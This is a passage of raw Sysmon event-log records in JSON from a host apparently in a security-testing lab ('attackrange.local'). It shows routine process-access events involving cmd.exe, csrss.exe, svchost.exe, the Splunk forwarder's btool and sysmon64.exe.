AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-023C-5F25-0000-0010924B0500}","ParentProcessId":"3344","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3476,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-023C-5F25-0000-0010924B0500}\r\nSourceProcessId: 3344\r\nSourceThreadId: 4660\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-00104E4C0500}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-023C-5F25-0000-0010924B0500}","SourceProcessId":"3344","SourceThreadId":"4660","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-00104E4C0500}","TargetProcessId":"4656","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3477,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-00104E4C0500}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-00104E4C0500}","TargetProcessId":"4656","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3478,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3479,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3480,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3481,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3482,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3483,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.232","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3484,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.232\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 